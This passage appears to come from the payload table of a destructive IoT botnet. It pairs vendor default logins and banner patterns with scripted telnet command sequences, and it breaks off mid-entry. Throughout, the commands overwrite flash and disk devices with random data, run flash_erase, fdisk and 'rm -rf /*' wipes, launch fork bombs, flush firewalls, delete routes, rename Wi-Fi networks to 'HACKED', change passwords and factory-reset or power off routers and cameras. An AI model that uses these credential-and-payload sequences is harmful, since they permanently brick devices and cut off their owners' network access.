$(sh)' , '' , 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' , 'kill `sh`' , '' , 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' , 'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' , 'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root' , '' , 'tftp -p -f test ;route del default' , '' , 'ifconfig $(sh)' , '' , 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' , 'cat | sh' , '' , 'sh' , '[#>]' , 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'route del default;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' , 'poweroff -n -f' , '[#>]' , 'poweroff' , '[#>]' , 'd(){ d|d & };d 2>/dev/null' , '' , 'ping ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' , 'traceroute ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' , 'loaddefaultconfig' , '[#>]' , 'adsl connection --loopback' , '' , 'xdslctl connection --loopback' , '' , 'ppp config ppp0 down' , '' , 'ppp config ppp0.1 down' , '' , 'ppp config ppp0.2 down' , '' , 'ppp config ppp1 down' , '' , 'ppp config ppp1.1 down' , '' , 'ppp config ppp2.1 down' , '' , 'ppp config ppp3.3 down' , '' , 'ppp config pppo3G0 down' , '' , 'save' , '' , 'defaultgateway config ppp0' , '' , 'defaultgateway config ppp1.1' , '' , 'defaultgateway config ppp2.1' , '' , 'save' , '' , 'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' , 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' , 'save' , '' , 'wan delete service ppp0' , '[#>]' , 'wan delete service ppp0.1' , '[#>]' , 'wan delete service ppp1.1' , '[#>]' , 'wan delete service pppoa1' , '[#>]' , 'wan delete service pppoa0' , '[#>]' , 'wan delete service ppp0.2' , '[#>]' , 'wan delete service ppp1.2' , '[#>]' , 'wan delete service ppp2.1' , '[#>]' , 'wan delete service eth4.1' , '[#>]' , 'wan delete service eth4.2' , '[#>]' , 'wan delete service ipoe_eth0_4' , '[#>]' , 'wan delete service ipoe_eth0_3' , '[#>]' , 'wan delete service ipoe_eth0_2' , '[#>]' , 'wan delete service ipoe_eth0_1' , '[#>]' , 'restoredefault' , '' , 'exit' , '' , 'loaddefaultconfig' , '[#>]' , 'adsl connection --loopback' , '' , 'xdslctl connection --loopback' , '' , 'ppp config ppp0 down' , '' , 'ppp config ppp0.1 down' , '' , 'ppp config ppp0.2 down' , '' , 'ppp config ppp1 down' , '' , 'ppp config ppp1.1 down' , '' , 'ppp config ppp2.1 down' , '' , 'ppp config ppp3.3 down' , '' , 'ppp config pppo3G0 down' , '' , 'save' , '' , 'defaultgateway config ppp0' , '' , 'defaultgateway config ppp1.1' , '' , 'defaultgateway config ppp2.1' , '' , 'save' , '' , 'wan delete service ppp0' , '[#>]' , 'wan delete service ppp0.1' , '[#>]' , 'wan delete service ppp1.1' , '[#>]' , 'wan delete service pppoa1' , '[#>]' , 'wan delete service pppoa0' , '[#>]' , 'wan delete service ppp0.2' , '[#>]' , 'wan delete service ppp1.2' , '[#>]' , 'wan delete service ppp2.1' , '[#>]' , 'wan delete service eth4.1' , '[#>]' , 'wan delete service eth4.2' , '[#>]' , 'wan delete service ipoe_eth0_4' , '[#>]' , 'wan delete service ipoe_eth0_3' , '[#>]' , 'wan delete service ipoe_eth0_2' , '[#>]' , 'wan delete service ipoe_eth0_1' , '[#>]' , 'restoredefault' , '' , 'reboot' , '' ] , [ "broadcom" , ".*" , 'support:\S+:0:0:Technical Support:.:.bin.sh' , 'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' , 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' , 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' , 'wlan config --enable 0' , '' , 'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' , 'wlan config --status primary disable' , '' , 'save' , '' , 'tr69cfg --inform disable' , '' , 'tr69cfg --connreq disable' , '' , 'tr69cfg --password HACKED' , '' , 'tr69cfg --intf HACKED' , '' , 'tr69cfg --info' , '' , 'tr69c ConnReqPort 31351' , '' , 'save' , '' , 'sh' , '[$>#] ' , 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' , "restoredefault" , '[$>#] ' , 'reboot' , '%TERM%' ] , [ "broadcom" , ".*" , 'Linux.*\(\S+txcpyjeb\S*\)' , 'sh' , '[$>#] ' , 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' , 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' , "restoredefault" , '[$>#] ' , 'reboot' , '%TERM%' ] , [ 'broadcom' , '.*' , 'from HyperTerminal you would need to use' , 'cat /dev/urandom >/dev/mtdblock0 &' , 'to continue' , '' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , 'to continue' , '' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , 'to continue' , '' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , 'to continue' , '' , '' , 'iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP' , 'to continue' , '' , '' , '12' , '==>' , '1' , 'Please wait' , ] , [ 'broadcom' , 'supervisor/zyad1234' , '' , 'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' , 'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' , 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' , 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' , 'wlan config --enable 0' , '' , 'save' , '' , 'tr69cfg --inform disable' , '' , 'tr69cfg --connreq disable' , '' , 'tr69cfg --password HACKED' , '' , 'tr69cfg --intf HACKED' , '' , 'tr69cfg --info' , '' , 'save' , '' , 'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' , 'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3' , '' , 'tftp -p -f test ;route del default' , '' , "adsl connection --loopback\nxdslctl connection --loopback\nppp config ppp0 down\nppp config ppp1.1 down\nppp config ppp2.1 down\nppp config ppp3.3 down\nppp config pppo3G0 down\nsave" , '' , 'defaultgateway config ppp0' , '' , 'defaultgateway config ppp1.1' , '' , 'defaultgateway config ppp2.1' , '' , 'sh' , '[#>]' , 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' , 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'route del default;iptables -F;iptables -A INPUT -j DROP' , '' , 'poweroff -n -f' , '[#>]' , 'poweroff' , '[#>]' , 'restoredefault' , '' , 'exit' , '' , 'restoredefault' , '%TERM%' ] , [ 'xiongctrl' , 'admin/.*' , 'PORT:9527:' , 'shell\nbusybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default' , '[$] ' , 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , 'exit' , '[$] ' , 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , ';;' , '[$] ' , 'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , 'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' , ] , [ 'baby' , '.*' , '(www\.netween\.co\.kr|rjhm91lt37eEtYB0Czii1)' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[$>#] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[$>#] ' , 'cat /dev/urandom >/dev/root &' , '%WAIT%' , 'cd /web/' , '[$>#] ' , 'grep "reboot" *' , '[$>#] ' , ] , [ 'vertex' , 'root/vertex25ektks123' , '' , 'configure terminal' , '[$>#] ' , 'restore factory-defaults' , '[$>#] ' , 'exit' , '[$>#] ' , 'quote sh' , '[$>#] ' , 'cat /dev/urandom >/dev/root &' , '[$>#] ' , 'cat /dev/urandom >/dev/ram &' , '[$>#] ' , 'route del default' , '%WAIT%' , 'reboot' , ] , [ 'honeypot' , OoO0 , '' , 'cat /etc/passwd' , '' , 'cat /etc/shadow' , '' , 'uname -a' , '' , ] , [ 'honeypot' , '.*' , '(fw-mgmt0|Ubuntu|el\d\.x86_?64|Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent|Linux\s\S+S\d\s.*x86_?64|Linux\s.*amd64.*SMP.*Debian.*x86_?64)' , 'echo SYSTEM HACKED PLEASE REINSTALL >/etc/motd' , '' , 'echo SYSTEM HACKED PLEASE REINSTALL >/etc/version' , '' , 'echo SYSTEM-HACKED-PLEASE-REINSTALL >/etc/hostname' , '' , 'wall \x1b]2;HACKED\x07' , '' , ] , [ "sagemcom" , ".*" , 'HomeGateway.*\s*.*Bad\scommand.*Try\susing\shelp' , "conf print /admin/" , "HomeGateway> " , "conf set /admin/rmt_mng/ports/2/enabled 0" , "HomeGateway> " , "conf set /admin/rmt_mng/ports/1/enabled 0" , "HomeGateway> " , "conf set /admin/rmt_mng/ports/0/enabled 0" , "HomeGateway> " , "conf set /admin/user/2/password x" , "HomeGateway> " , "conf set /admin/user/1/password x" , "HomeGateway> " , "conf set /admin/user/0/password x" , "HomeGateway> " , "conf reconf 1" , "HomeGateway> " , "flash commit" , "HomeGateway> " , "system reboot" , '%TERM%' , ] , [ "sagemcom" , ".*" , 'OpenRG>' , "conf print /admin/" , "OpenRG> " , "conf set /admin/rmt_mng/ports/2/enabled 0" , "OpenRG> " , "conf set /admin/rmt_mng/ports/1/enabled 0" , "OpenRG> " , "conf set /admin/rmt_mng/ports/0/enabled 0" , "OpenRG> " , "conf set /admin/user/2/password x" , "OpenRG> " , "conf set /admin/user/1/password x" , "OpenRG> " , "conf set /admin/user/0/password x" , "OpenRG> " , "conf reconf 1" , "OpenRG> " , "flash commit" , "OpenRG> " , "system reboot" , '%TERM%' , ] , [ "nomadix" , '.*' , 'Display advanced system configuration menu' , 'system' , '\S>' , 'factory' , 'yes/no' , 'yes' , 'CR' , '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' , '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' , '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' , ] , [ 'sse' , '.*' , 'step into administration terminal' , '' , '~ ' , 'd() { d|d & }; d' , '~ ' , ] , [ 'cisco' , '.*' , 'User Access Verification' , 'enable' , '\S+[#>]' , 'erase /all nvram:' , 'confirm' , 'y' , '\S+[#>]' , 'erase startup-config' , 'confirm' , 'y' , '\S+[#>]' , 'reload' , 'yes/no' , 'y' , 'confirm' , 'y' , '' , 'power rps port 6 mode standby' , '\S+[#>]' , 'power rps port 5 mode standby' , '\S+[#>]' , 'power rps port 4 mode standby' , '\S+[#>]' , 'power rps port 3 mode standby' , '\S+[#>]' , 'power rps port 2 mode standby' , '\S+[#>]' , 'power rps port 1 mode standby' , '\S+[#>]' , ] , [ 'kylink' , '.*' , 'Kylink SIP' , '8' , 'y/n' , 'y' , '\):' , '9' , 'y/n' , 'y' , '\):' , '1' , '\):' , '1' , '\):' , '1.2.3.4' , '\):' , '3' , '\):' , '1.2.3.5' , '\):' , 'q' , '\):' , '9' , 'y/n' , 'y' , '\):' , 'b' , 'y/n' , 'y' , 'seconds' , ] , [ "dahuaold" , "root/vizxv" , '' , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/sda &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' , 'busybox cat /dev/urandom >/dev/mmc0 &' , '' , 'busybox cat /dev/urandom >/dev/sdb &' , '' , 'busybox cat /dev/urandom >/dev/ram0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' , "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ "hilinux" , ".*" , 'Welcome to HiLinux' , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/sda &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' , 'busybox cat /dev/urandom >/dev/mmc0 &' , '' , 'busybox cat /dev/urandom >/dev/sdb &' , '' , 'busybox cat /dev/urandom >/dev/ram0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' , "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ "zlx" , "root/zlxx\." , "" , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/sda &' , '' , 'busybox cat /dev/urandom >/dev/ram0 &' , '' , 'flash_unlock /dev/mtd0' , '' , 'flash_eraseall /dev/mtd0 &' , '' , 'flash_unlock /dev/mtd1' , '' , 'flash_eraseall /dev/mtd1 &' , '' , 'flash_unlock /dev/sda' , '' , 'flash_eraseall /dev/sda &' , '' , 'flash_unlock /dev/mtdblock0' , '' , 'flash_eraseall /dev/mtdblock0 &' , '' , "fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '[#$] ' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ 'netbox' , '.*' , "ERROR: no such command \'w\'" , 'shell' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'route del default' , '%WAIT%' , ] , [ 'falcon' , '.*' , '(Unknown Command: \'|RMT:\d+.*@telnet:)' , 'offline' , '[>#] ' , 'offline' , '[>#] ' , 'passwd' , 'password' , '%OLDPASS%' , 'password' , '%NEWPASS%' , 'password' , '%NEWPASS%' , '[>#] ' , 'reset board' , '[>#] ' , 'DSC sleep 99999999' , '[>#] ' , 'ip sat0 add 1.2.3.4 255.255.255.0 1.2.3.5 sat0' , '[>#] ' , 'params GLOBAL set max_mssg_bufs 1' , '[>#] ' , 'params GLOBAL set initial_mssg_bufs 1' , '[>#] ' , 'params SECURITY set falcon_console_from_localhost_only 1' , '[>#] ' , 'params LL set ll_tx_window 1' , '[>#] ' , 'params LL set ll_rx_window 1' , '[>#] ' , 'params SPOOF set spoof_oos_buffer_size 1' , '[>#] ' , 'params PAD set pad_tdma_payload 1' , '[>#] ' , 'reset application' , '%WAIT%' , 'ENTER_ERROR_STATE' , '[>#] ' , 'TERMINATE' , '[>#] ' , ] , [ "chin" , 'root/1001chin' , '' , 'dd if=/dev/urandom of=/dev/sda1 &' , '' , 'dd if=/dev/urandom of=/dev/sda2 &' , '' , 'dd if=/dev/urandom of=/dev/sda3 &' , '' , 'dd if=/dev/urandom of=/dev/sda4 &' , '' , 'dd if=/dev/urandom of=/dev/sda &' , '' , 'dd if=/dev/urandom of=/dev/root &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' , 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' , 'halt -n -f' , '[#$>] ' , 'reboot' , '[#$>] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ "faraday" , "root/GM8182" , "" , "cat /dev/urandom >/dev/sda &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mtdblock6 &\ncat /dev/urandom >/dev/mtdblock7 &\ncat /dev/urandom >/dev/mtdblock8 &\ncat /dev/urandom >/dev/root &\nroute del default" , '' , "fdisk -C 1 /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/mtdblock4" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/mtdblock5" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/mtdblock6" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/mtdblock7" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/mtdblock8" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk -C 1 /dev/root" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "route del default" , '%WAIT%' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT% ' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ "ht-tm" , "root/20080826" , "" , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/mtd2 &' , '' , 'busybox cat /dev/urandom >/dev/mtd3 &' , '' , 'busybox cat /dev/urandom >/dev/mtd4 &' , '' , 'busybox cat /dev/urandom >/dev/mtd5 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' , 'route del default;rm -rf /* &' , '%TERM%' , ] , [ "ht-tm" , ".*" , "root.*cIUPc1dKQYHkkKkiVpM" , '%RELAUNCH%' , '%RELAUNCH%' , ] , [ "xiongmai" , "root/xc3511" , '' , "busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/mtd2 &' , '' , 'busybox cat /dev/urandom >/dev/mtd3 &' , '' , 'busybox cat /dev/urandom >/dev/mtd4 &' , '' , 'busybox cat /dev/urandom >/dev/mtd5 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' , 'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" , "poweroff -n -f" , '%TERM%' , ] , [ "xiongmai" , "root/xmhdipc" , '' , "busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' , 'busybox cat /dev/urandom >/dev/mtd0 &' , '' , 'busybox cat /dev/urandom >/dev/mtd1 &' , '' , 'busybox cat /dev/urandom >/dev/mtd2 &' , '' , 'busybox cat /dev/urandom >/dev/mtd3 &' , '' , 'busybox cat /dev/urandom >/dev/mtd4 &' , '' , 'busybox cat /dev/urandom >/dev/mtd5 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' , 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' , 'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" , "poweroff -n -f" , '%TERM%' , ] , [ "zte" , "root/Zte521" , '' , 'flash_eraseall /dev/mtd0 >/dev/null &' , '' , 'flash_eraseall /dev/mtd1 >/dev/null &' , '' , 'flash_eraseall 